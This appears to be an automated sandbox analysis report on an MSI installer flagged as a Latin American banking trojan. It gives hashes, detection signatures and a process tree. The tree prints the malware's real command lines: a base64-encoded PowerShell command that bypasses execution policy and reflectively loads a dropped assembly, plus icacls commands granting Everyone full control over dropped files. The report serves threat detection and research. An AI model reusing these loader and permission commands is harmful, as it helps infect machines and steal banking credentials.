Edit tour
Windows
Analysis Report
cB1ItKbbhY.msi
Overview
General Information
| Sample name: | cB1ItKbbhY.msirenamed because original name is a hash value |
| Original sample name: | 145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae.msi |
| Analysis ID: | 1578854 |
| MD5: | 41744d644791bdbbcff4b05a3e1e98e0 |
| SHA1: | 9b7e8548591f1578309cefd2841e757b1656f00a |
| SHA256: | 145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae |
| Tags: | bankerlatammsiPAGAMENTOS-DIGITAIS-LTDAtrojanuser-johnk3r |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
msiexec.exe (PID: 5696 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\Desktop\ cB1ItKbbhY .msi" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 6496 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 3428 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng E94365C FD725BFADC 9A5695E48A 7145F MD5: 9D09DC1EDA745A5F87553048E57620CF) 
MSI2EE6.tmp (PID: 3040 cmdline: "C:\Window s\Installe r\MSI2EE6. tmp" /Hide Window "C: \Program F iles (x86) \Dasmei su pport\App Dasmei ins taller\pse xec.exe" " C:\Program Files (x8 6)\Dasmei support\Ap p Dasmei i nstaller\1 e.ps1" MD5: D2F8C062ABA50CA096CBD5387A2D0B8B) 
psexec.exe (PID: 4864 cmdline: "C:\Progra m Files (x 86)\Dasmei support\A pp Dasmei installer\ psexec.exe " "C:\Prog ram Files (x86)\Dasm ei support \App Dasme i installe r\1e.ps1" MD5: 79AB86017B2C9B713D6AF08086B1937F) 
powershell.exe (PID: 796 cmdline: "C:\Window s\system32 \windowspo wershell\v 1.0\powers hell.exe" -sta -nopr ofile -exe cutionpoli cy bypass -encodedco mmand JAB4 AD0AJwAzAD EAOQAzADIA NgBiADYALQ BjADQANgBi AC0ANAA1AD AANwAtADgA NABkADIALQ A5ADgAMgAz ADUAOQAzAG UAMgA1AGYA NAAnADsAJA B5AD0AJwBD ADoAXABQAH IAbwBnAHIA YQBtACAARg BpAGwAZQBz ACAAKAB4AD gANgApAFwA RABhAHMAbQ BlAGkAIABz AHUAcABwAG 8AcgB0AFwA QQBwAHAAIA BEAGEAcwBt AGUAaQAgAC AAaQBuAHMA dABhAGwAbA BlAHIAXABw AHMAZQB4AG UAYwAuAGUA eABlACcAOw B0AHIAeQAg AHsADQAKAC AAIABpAGYA IAAoAFsARQ BuAHYAaQBy AG8AbgBtAG UAbgB0AF0A OgA6AFYAZQ ByAHMAaQBv AG4ALgBNAG EAagBvAHIA IAAtAGcAZQ AgADQAKQAN AAoAIAAgAH sAIAAkAG4A dQBsAGwAIA A9ACAAWwBS AGUAZgBsAG UAYwB0AGkA bwBuAC4AQQ BzAHMAZQBt AGIAbAB5AF 0AOgA6AFUA bgBzAGEAZg BlAEwAbwBh AGQARgByAG 8AbQAoACQA eQApACAAfQ AgAGUAbABz AGUAIAB7AC AAJABuAHUA bABsACAAPQ AgAFsAUgBl AGYAbABlAG MAdABpAG8A bgAuAEEAcw BzAGUAbQBi AGwAeQBdAD oAOgBMAG8A YQBkAEYAaQ BsAGUAKAAk AHkAKQB9AA 0ACgAgACAA LgAgACgAWw BfADMAMgAu AF8AOAA4AF 0AOgA6AF8A NwA0ACgAJA B4ACkAKQAN AAoAIAAgAG UAeABpAHQA IAAkAEwAQQ BTAFQARQBY AEkAVABDAE 8ARABFAA0A CgB9ACAADQ AKAGMAYQB0 AGMAaAAgAF sATgBvAHQA UwB1AHAAcA BvAHIAdABl AGQARQB4AG MAZQBwAHQA aQBvAG4AXQ ANAAoAewAN AAoAIAAgAF cAcgBpAHQA ZQAtAEgAbw BzAHQAIAAn AEEAcABwAG wAaQBjAGEA dABpAG8Abg AgAGwAbwBj AGEAdABpAG 8AbgAgAGkA cwAgAHUAbg B0AHIAdQBz AHQAZQBkAC 4AIABDAG8A cAB5ACAAZg BpAGwAZQAg AHQAbwAgAG EAIABsAG8A YwBhAGwAIA BkAHIAaQB2 AGUALAAgAG EAbgBkACAA dAByAHkAIA BhAGcAYQBp AG4ALgAnAC AALQBGAG8A cgBlAGcAcg BvAHUAbgBk AEMAbwBsAG 8AcgAgAFIA ZQBkAA0ACg B9AA0ACgBj AGEAdABjAG gAIAB7AA0A CgAgACAAVw ByAGkAdABl AC0ASABvAH MAdAAgACgA IgBFAHIAcg BvAHIAOgAg ACIAIAArAC AAJABfAC4A RQB4AGMAZQ BwAHQAaQBv AG4ALgBNAG UAcwBzAGEA ZwBlACkAIA AtAEYAbwBy AGUAIABSAG UAZAAgAA0A CgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6520 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - icacls.exe (PID: 4184 cmdline:
"C:\Window s\system32 \icacls.ex e" C:\Nvid ia-59226 / grant Ever yone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D) 
WmiPrvSE.exe (PID: 6108 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - icacls.exe (PID: 7528 cmdline:
"C:\Window s\system32 \icacls.ex e" C:\Nvid ia-59226\N vidia-5922 6.exe /gra nt Everyon e:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D) 
Nvidia-59226.exe (PID: 7556 cmdline: "C:\Nvidia -59226\Nvi dia-59226. exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- svchost.exe (PID: 6368 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Nvidia-59226.exe (PID: 7796 cmdline:
"C:\Nvidia -59226\Nvi dia-59226. exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||